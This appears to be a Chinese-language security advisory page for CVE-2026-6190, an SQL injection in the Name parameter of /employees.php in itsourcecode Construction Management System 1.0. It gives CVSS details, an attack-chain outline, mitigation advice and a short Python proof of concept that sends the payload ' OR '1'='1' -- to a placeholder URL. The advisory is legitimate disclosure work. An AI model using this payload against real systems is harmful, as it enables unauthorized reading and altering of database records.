CVE-2026-6190 CVSS 6.3 中危

CVE-2026-6190: itsourcecode系统SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6190

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Construction Management System

漏洞概述

itsourcecode Construction Management System 1.0版本中存在一个SQL注入漏洞。该漏洞源于文件/employees.php中的未知函数未能正确过滤用户输入的Name参数。由于缺乏有效的输入验证，攻击者可以通过网络远程发起攻击，无需用户交互即可利用此漏洞。成功利用该漏洞可能导致数据库信息泄露（低机密性影响）、数据篡改（低完整性影响）以及服务中断（低可用性影响）。目前该漏洞的利用代码已公开，建议相关用户尽快采取措施。

技术细节

该漏洞位于itsourcecode Construction Management System 1.0的/employees.php文件中。核心问题在于系统在处理用户输入时缺乏有效的安全机制，特别是在处理“Name”参数时，未经过滤或转义便直接拼接到SQL查询语句中。这种编程错误允许攻击者通过构造包含特定SQL语法（如单引号、注释符、UNION SELECT等）的恶意输入，从而改变原始查询逻辑。根据CVSS v3.1评分向量（AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L），攻击者可以通过网络发起攻击，利用难度较低，且仅需低权限账号即可在无用户交互的情况下完成利用。虽然漏洞对系统的影响范围未扩散到其他组件，但仍会导致数据库敏感信息泄露、数据被非法篡改或删除。鉴于漏洞利用代码已公开，风险处于较高水平。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是itsourcecode Construction Management System 1.0，并定位到/employees.php接口。

STEP 2

武器化

攻击者构造针对Name参数的恶意SQL注入Payload，例如使用 ' OR '1'='1 来绕过验证或提取数据。

STEP 3

交付

攻击者通过网络向受害者的/employees.php端点发送包含恶意Payload的HTTP请求。

STEP 4

利用

后端服务器接收请求，将未经过滤的Name参数直接拼接到SQL语句中执行，导致数据库执行了攻击者的恶意命令。

STEP 5

影响

数据库返回敏感信息，或者攻击者利用该漏洞修改/删除数据，导致系统机密性、完整性和可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://example.com/employees.php"

# Malicious payload to test SQL Injection
# Example: ' OR '1'='1' -- 
payload = "test' OR '1'='1' -- "

# Parameters to be sent
params = {
    "Name": payload
}

try:
    # Sending GET request
    response = requests.get(target_url, params=params, timeout=10)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500]) # Print first 500 chars for analysis
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施

建议立即检查系统版本，如果无法立即升级，应在Web应用前端或网关处添加针对Name参数的过滤规则，拦截单引号、双横线、UNION等SQL关键字。同时，限制数据库用户的读写权限，防止敏感数据被批量导出或删除。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6190
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6190
3 Details https://www.cvedetails.com/cve/CVE-2026-6190/
4 VulDB https://vuldb.com/cve/CVE-2026-6190
5 Link https://github.com/ltranquility/cve_submit/issues/15
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/797383
8 Link https://vuldb.com/vuln/357112
9 Link https://vuldb.com/vuln/357112/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表